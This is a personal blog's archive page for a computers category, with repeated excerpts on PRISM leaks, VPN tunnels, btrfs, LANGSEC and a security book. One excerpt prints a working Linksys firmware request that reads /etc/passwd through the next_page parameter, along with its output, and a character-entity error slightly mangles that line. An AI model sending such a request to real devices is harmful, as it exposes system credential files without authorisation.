[wikileaks ]PRISM – DHS PRISM 2004 – Requirements for Installation (original doc)
Saturday, June 8th, 2013original PRISM docs from wikileaks
original PRISM docs from wikileaks
Posted in infosec, policy, politics, privacy, Security, wikileaks | Comments Off | permalink
How to create dynamic VPN tunnel between a linux server and Mikrotik device. This is suitable if you want to create a tunnel between an EC2 instance and small office
NOTE: Example does not provide encryption.
Posted in dynamic, l2tp, Linux, mikrotik, ppp, tunnel, vpn | Comments Off | permalink
How to create dynamic VPN tunnel between a linux server and Mikrotik device. This is suitable if you want to create a tunnel between an EC2 instance and small office
NOTE: Example does not provide encryption.
Posted in dynamic, l2tp, Linux, mikrotik, ppp, tunnel, vpn | Comments Off | permalink
Today we’re talking about our experience with btrfs, the next-gen Linux filesystem. btrfs has been maturing rapidly over the last few years and offers many compelling features for modern systems, so we’ve been putting it through its paces on some o…
Posted in backup, btrfs, experiment, filesystems, Linux | Comments Off | permalink
Today we’re talking about our experience with btrfs, the next-gen Linux filesystem. btrfs has been maturing rapidly over the last few years and offers many compelling features for modern systems, so we’ve been putting it through its paces on some o…
Posted in backup, btrfs, experiment, filesystems, Linux | Comments Off | permalink
The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…
Posted in infosec, paper, Security | Comments Off | permalink
The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…
Posted in infosec, paper, Security | Comments Off | permalink
Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier
Posted in book, engineering, Security | Comments Off | permalink
Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier
Posted in book, engineering, Security | Comments Off | permalink
the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nolog…
Posted in linksys, networking, Security | Comments Off | permalink
You are currently browsing the archives for the Computers category.
Konstantin Antselovich (c) 2004-2011
powered by WordPress
Entries (RSS)
and Comments (RSS).